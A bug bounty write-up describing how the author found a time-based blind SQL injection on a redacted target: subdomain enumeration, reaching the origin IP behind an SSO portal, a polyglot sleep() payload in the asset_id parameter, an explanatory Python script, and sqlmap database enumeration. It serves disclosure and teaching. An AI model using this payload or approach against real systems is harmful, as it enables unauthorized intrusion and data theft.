Hi, I'm mrx_w_ (Adem Ziane Berroudja), a bug bounty hunter on Bugcrowd. You can find me on Twitter and LinkedIn under mrx_w_. In this write-up, I'll share how I discovered a blind SQL injection vulnerability on a target I'll refer to as redacted.com, starting from a restricted subdomain and pivoting through exposed infrastructure.
Our target was a private program on Bugcrowd with a wildcard scope of *.redacted.com.
The first thing I usually do when working with a wildcard scope is subdomain enumeration. I used a combination of tools and techniques such as:
- Subfinder
- Amass
- Google dorking
- SecurityTrails
After collecting a list of subdomains, I filtered the live ones and started testing them one by one.
During this process, I came across the following subdomain:
https://ci-portal.redacted.redacted.com/
When accessing it, I was presented with an SSO login page, which initially limited further interaction with the application.
I tried several methods to bypass the SSO and access the subdomain content directly, but none of them were successful.
I then decided to investigate the infrastructure behind the subdomain. Using SecurityTrails, I looked up the DNS records for the subdomain and was able to identify its origin IP addresses:

As you can see, the lookup returned two IP addresses. I started by accessing the first one, 3.*.*.*.
When opening the IP, I was presented with a default homepage containing several links to different parts of the application. While exploring these, I discovered the following endpoint:
/email-asset-editor/ajax/saveChanges.php
Accessing this endpoint returned the following editor page:

When I entered a random value in the "enter filename" field, I observed a POST request containing three parameters: asset_id, html_content, and json_attributes.
The first thing that came to mind was to test for SQL injection, especially since the endpoint was a PHP script taking user-controlled parameters.
I used a time-based payload that I had seen Orwa Atyat use:
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
I injected this payload into the asset_id parameter and observed a 10-second delay:
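To make explicit why this one payload triggers a delay no matter how the PHP code quotes asset_id, here is an added Python example (not from the original write-up and not the target's code). It renders the payload into three assumed query templates (unquoted, single-quoted, double-quoted; the table and column names are assumptions for illustration) and then strips block comments and string literals, leaving only the SQL the engine would actually evaluate, so you can see which sleep() call survives in each context.

```python
import re

# The polyglot time-based payload quoted in the write-up.
PAYLOAD = (
    "(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'\""
    "+(select(0)from(select(sleep(6)))v)+\"*/"
)

# Three hypothetical ways a PHP handler might splice asset_id into a query.
# These templates are assumptions; the real server-side code is unknown.
TEMPLATES = {
    "unquoted":      "SELECT * FROM assets WHERE asset_id={v}",
    "single_quoted": "SELECT * FROM assets WHERE asset_id='{v}'",
    "double_quoted": 'SELECT * FROM assets WHERE asset_id="{v}"',
}


def render(template, value):
    """Build the query the way naive string concatenation would."""
    return template.format(v=value)


def strip_inactive(sql):
    """Drop /* ... */ comments and quoted string literals.

    What remains is the part of the query the database parses as code,
    which is exactly where an injected sleep() has to land to fire.
    An unterminated comment or literal swallows the rest of the string,
    matching how the engine would treat it.
    """
    out = []
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        if sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            i = n if end == -1 else end + 2
            continue
        if c in ("'", '"'):
            j = i + 1
            while j < n:
                if sql[j] == c:
                    if j + 1 < n and sql[j + 1] == c:   # doubled-quote escape
                        j += 2
                        continue
                    break
                j += 1
            i = j + 1
            continue
        out.append(c)
        i += 1
    return "".join(out)


def active_sleeps(sql):
    """Return the sleep() durations that sit in live SQL, in order."""
    return [int(s) for s in re.findall(r"sleep\((\d+)\)", strip_inactive(sql))]


def analyse(value):
    """Map each quoting context to the sleep() calls that would execute."""
    return {name: active_sleeps(render(t, value)) for name, t in TEMPLATES.items()}


if __name__ == "__main__":
    for ctx, sleeps in analyse(PAYLOAD).items():
        print(f"{ctx:14s} -> live sleep() calls: {sleeps}")
```

In every context exactly one sleep() ends up outside any comment or string: the first branch in the unquoted case, the second in the single-quoted case, and the third in the double-quoted case. In MySQL the surrounding `+` operators coerce the leftover string fragments to 0, so the expression stays valid and the delay is the only visible effect. The third branch deliberately sleeps 6 seconds instead of 5, so the length of the delay also tells you which quoting context the parameter is in.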

After confirming that the asset_id parameter was vulnerable to SQL injection, I saved the raw request to a file (sqli.txt).
I then used sqlmap to enumerate the databases with the following command:
sqlmap -r sqli.txt --dbs
sqlmap listed 22 databases without any issues, confirming the severity and impact of the vulnerability.
After that, I prepared a full report including all the required requests to reproduce the issue, along with a clear proof of concept. The vulnerability was later validated as a P1 and rewarded accordingly.
